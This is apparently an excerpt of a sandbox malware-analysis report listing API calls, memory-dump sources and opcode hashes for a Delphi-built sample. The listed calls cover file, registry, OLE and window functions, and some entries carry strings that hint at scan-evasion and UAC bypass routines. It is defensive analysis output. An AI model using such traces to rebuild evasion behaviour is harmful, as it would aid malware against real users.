                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,04119DE8,?,?,04115B68,00000001), ref: 04119CFC
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,04119DE8,?,?,04115B68,00000001), ref: 04119D2A
                                                                                                      • Part of subcall function 04108CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,04115B68,04119D6A,00000000,04119DE8,?,?,04115B68), ref: 04108D2E
                                                                                                      • Part of subcall function 04108F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,04115B68,04119D85,00000000,04119DE8,?,?,04115B68,00000001), ref: 04108F3B
                                                                                                    • GetLastError.KERNEL32(00000000,04119DE8,?,?,04115B68,00000001), ref: 04119D8F
                                                                                                      • Part of subcall function 0410B878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0410D5E5,00000000,0410D63F), ref: 0410B897
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 503785936-0
                                                                                                    • Opcode ID: 16b685dbb28485d0dc71977e38e31ff0649a67f11120de51fd40efa87be9827b
                                                                                                    • Instruction ID: b0c35c98f9a9faed86f6e228ae2c1d60e9e5372a99a27dedf11d9b11872fae00
                                                                                                    • Opcode Fuzzy Hash: 16b685dbb28485d0dc71977e38e31ff0649a67f11120de51fd40efa87be9827b
                                                                                                    • Instruction Fuzzy Hash: 33314070A042499FEB00EFA5C9D0B9EBBF5AF49308F508165E514A72D0DBB97E04CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,0428ED0C), ref: 0415C7CC
                                                                                                    • RegSetValueExA.ADVAPI32(000008AC,00000000,00000000,00000001,00000000,0000001C,00000000,0415C837), ref: 0415C804
                                                                                                    • RegCloseKey.ADVAPI32(000008AC,000008AC,00000000,00000000,00000001,00000000,0000001C,00000000,0415C837), ref: 0415C80F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 779948276-0
                                                                                                    • Opcode ID: 4a0e4809070496226994b345cf512ec63ac2dc5aa545c140013cce3a428e7f4e
                                                                                                    • Instruction ID: 1c695b3745f0937a2971311e22112dca79c5725b4673ebff198e2fca9197b5ea
                                                                                                    • Opcode Fuzzy Hash: 4a0e4809070496226994b345cf512ec63ac2dc5aa545c140013cce3a428e7f4e
                                                                                                    • Instruction Fuzzy Hash: 08114871600208BFEB00FFA8DDC599E7BFCEB09604F418565F904E72A0DBB4BE118A50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: 2019d2450646760bf734642348acd471d802b1a624ced995ac524ab6b1abf656
                                                                                                    • Instruction ID: eece8f8a77d6c570f06b040ddf036d34d0f519f700aa4f79670ccc12311d6139
                                                                                                    • Opcode Fuzzy Hash: 2019d2450646760bf734642348acd471d802b1a624ced995ac524ab6b1abf656
                                                                                                    • Instruction Fuzzy Hash: A0F0227830020086B7387B388DC65A923889F00648B41C8B5E0429B2D1DFF4FC4BD323
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 04105063
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04105075
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 986138563-0
                                                                                                    • Opcode ID: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
                                                                                                    • Instruction ID: f1356f7f2b1cfedd5e9de5f4de33313e7f295cac0f0f0dbdd4a6d62c141d5137
                                                                                                    • Opcode Fuzzy Hash: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
                                                                                                    • Instruction Fuzzy Hash: A6E0ECB81052056DFE146A6888C0F363369AF81741B65C4ADA500CA1E4DBBDB851A624
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0411F5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID: H
                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                    • Opcode ID: d81f2b782fca3a18651f7123ccbf8ac9d44f29574c1425e71d110c415af5dea9
                                                                                                    • Instruction ID: 026be1bb1e4caf75e4f40cb8caa2ad56ca3f74f40ec70be7ca7cf6ba1b06225a
                                                                                                    • Opcode Fuzzy Hash: d81f2b782fca3a18651f7123ccbf8ac9d44f29574c1425e71d110c415af5dea9
                                                                                                    • Instruction Fuzzy Hash: 10B1B075A016089FDB14CFA9E4C0A9DBBF6FF89314F2585A9E805AB360D730AD46CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04120524), ref: 041204F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    • Opcode ID: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
                                                                                                    • Instruction ID: 796a58e4511e56f452180bb5840b1d834568e22d4ac896086e01f2fb9f441c43
                                                                                                    • Opcode Fuzzy Hash: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
                                                                                                    • Instruction Fuzzy Hash: F5F0827230D2446FE704EAAC9D80BAB7B9C9BC5210F05817AF948C7181DB60DC098365
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04120524), ref: 041204F2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: MS Shell Dlg 2
                                                                                                    • API String ID: 3660427363-3198668166
                                                                                                    • Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                    • Instruction ID: 4dedee6ade5d847396dbef7e67e3dbdc5c358bd9fb8afaa4b0739716c07e4bdf
                                                                                                    • Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                    • Instruction Fuzzy Hash: 8FF037723051186BE704E96D9D80FAB7BDCDBC5254F018139B94CC7181DF61DC058361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 0410FAED
                                                                                                      • Part of subcall function 0410F6D0: VariantClear.OLEAUT32(?), ref: 0410F6DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy
                                                                                                    • String ID:
                                                                                                    • API String ID: 274517740-0
                                                                                                    • Opcode ID: 6ac81f67a86c8f06f72f36c66da4900b5eefcbe9e7733db7e69d2e0826b66101
                                                                                                    • Instruction ID: c895633486bb67223f34c715aa4fee66fc9174fca178acdc02ab4e1ff28d66ab
                                                                                                    • Opcode Fuzzy Hash: 6ac81f67a86c8f06f72f36c66da4900b5eefcbe9e7733db7e69d2e0826b66101
                                                                                                    • Instruction Fuzzy Hash: FE11C2307003108BEB34AF29C8D296773E9EF89250719C466E44A8F2D5DBF0FC42CA95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegFlushKey.ADVAPI32(00000000,?,041202E0,?,?,00000000,0412048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 04120285
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,041202E0,?,?,00000000,0412048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 0412028E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFlush
                                                                                                    • String ID:
                                                                                                    • API String ID: 320916635-0
                                                                                                    • Opcode ID: 8b6c78a4fb516c382b240a28acd5c82c32bd55bdd7229201c6335f5bac760729
                                                                                                    • Instruction ID: c391f17251aa5cd00b92901382a1672446ba779c44035a61d2b11fbefae8a385
                                                                                                    • Opcode Fuzzy Hash: 8b6c78a4fb516c382b240a28acd5c82c32bd55bdd7229201c6335f5bac760729
                                                                                                    • Instruction Fuzzy Hash: 2DD017B06002108AEF90EF7889C0B067BDC6F0C214B48C5A6E90CCF186DBA4E4608B20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927566239-0
                                                                                                    • Opcode ID: 75949a2ef6f37a5f26c56f06fe1923bde2bbc8c67acb2c419f877f67a6a1f298
                                                                                                    • Instruction ID: d31d0d2248931beebfc817ee6e673849e27b01d3c9821f61e8d89eff8542a7d5
                                                                                                    • Opcode Fuzzy Hash: 75949a2ef6f37a5f26c56f06fe1923bde2bbc8c67acb2c419f877f67a6a1f298
                                                                                                    • Instruction Fuzzy Hash: DD3154756002099FEB34DF98C8C69EA77E8EB49304F4485A2F905D3290D7F4F942C752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 04120374
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 9951a1932acdc37e8fe57757510f17e78cd6297d94db7ce60af290a67d9408c8
                                                                                                    • Instruction ID: 0dfb5288beb8a6507f6f70081ed9be1cdf92519a8c76551c72c14ff1d19b0e63
                                                                                                    • Opcode Fuzzy Hash: 9951a1932acdc37e8fe57757510f17e78cd6297d94db7ce60af290a67d9408c8
                                                                                                    • Instruction Fuzzy Hash: 43218730B00618AFE711EBA4DAD1B9EBBE9EB48304F118579A904E3291DB75AF159640
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041073CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                    • Instruction ID: 22677f18910c7fa4cb97580dc9c9eb06915b3f2a06f6f1ce795fdeb792c2a94c
                                                                                                    • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                    • Instruction Fuzzy Hash: B0F09DB2700158BFAB80DE9DDC84EDB77ECEB4C2A4B058166FA0CD7200D670ED108BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 041073CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                    • Instruction ID: 6605b6554f4923369ef8fae41d7b48605b3a5c41a751c0a2fa55fec4613f6e6f
                                                                                                    • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                    • Instruction Fuzzy Hash: A6F09DB2600158BF9B80DE9DDC84EDB77ECEB4C2A4B058166FA0CD7200D670ED108BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,0411EF85,?,?,?,00000000), ref: 0411EF65
                                                                                                      • Part of subcall function 04104F68: SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgString
                                                                                                    • String ID:
                                                                                                    • API String ID: 4225568880-0
                                                                                                    • Opcode ID: 40f3ad3190eb09af0a1b9599efc142d8c0bda581fa18422984bce256da5478ba
                                                                                                    • Instruction ID: eaa3c9526e2306dda04d51b6185fdb3cc027c4146a35e5938933d789f2b2e676
                                                                                                    • Opcode Fuzzy Hash: 40f3ad3190eb09af0a1b9599efc142d8c0bda581fa18422984bce256da5478ba
                                                                                                    • Instruction Fuzzy Hash: 7CE0E5302043047FE300EBB1CCC1D5DB69CDB89604BA184B1EC0093590DBB0BE008960
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(04100000,?,00000105), ref: 04105B96
                                                                                                      • Part of subcall function 04105DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,04100000,0416A794), ref: 04105DF8
                                                                                                      • Part of subcall function 04105DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E16
                                                                                                      • Part of subcall function 04105DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E34
                                                                                                      • Part of subcall function 04105DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04105E52
                                                                                                      • Part of subcall function 04105DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04105E9B
                                                                                                      • Part of subcall function 04105DDC: RegQueryValueExA.ADVAPI32(?,04106048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001), ref: 04105EB9
                                                                                                      • Part of subcall function 04105DDC: RegCloseKey.ADVAPI32(?,04105EE8,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04105EDB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 2796650324-0
                                                                                                    • Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                    • Instruction ID: 89fc8bc082ae79e9514411f16dc21c6b0f15b8cbd25bb6d7f5eca01b3c5fdd92
                                                                                                    • Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                    • Instruction Fuzzy Hash: 43E0ED71A01214EFDF10DE58C9C4A8637D9AB08754F048991AD58CF386D3F1EA508BE5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04108D78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                    • Instruction ID: 695530a4d054b02311181f55d3ed41584b0b9196a0b1573dc6f3b330ad3b8d80
                                                                                                    • Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                    • Instruction Fuzzy Hash: C9D05B723081107AE320A55A5DC4EAB5BDCCFC9770F104739B598C31C0D7609C018371
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0415D4C6,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanString,0419A350,04167AE0,UacScan,0419A350,04167AE0,UacInitialize), ref: 04108DEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
                                                                                                    • Instruction ID: 8e7df3ff580c76943f87ae30dd419fd2cb3d3e35dc9ebd39bd37c633dc2c88e1
                                                                                                    • Opcode Fuzzy Hash: 2785c1fc5c6a4e355bfa7689c33097217eaa1f53bd37c8fc86f03cf53ba053af
                                                                                                    • Instruction Fuzzy Hash: B0C08CF0316200073B1471FC0EC411A0A8889582393248FA1B438C31E3D7A2B0633124
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0416062B,ScanString,0419A350,04167AE0,OpenSession,0419A350,04167AE0,OpenSession,0419A350,04167AE0,ScanBuffer,0419A350,04167AE0,ScanString), ref: 04108E0F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
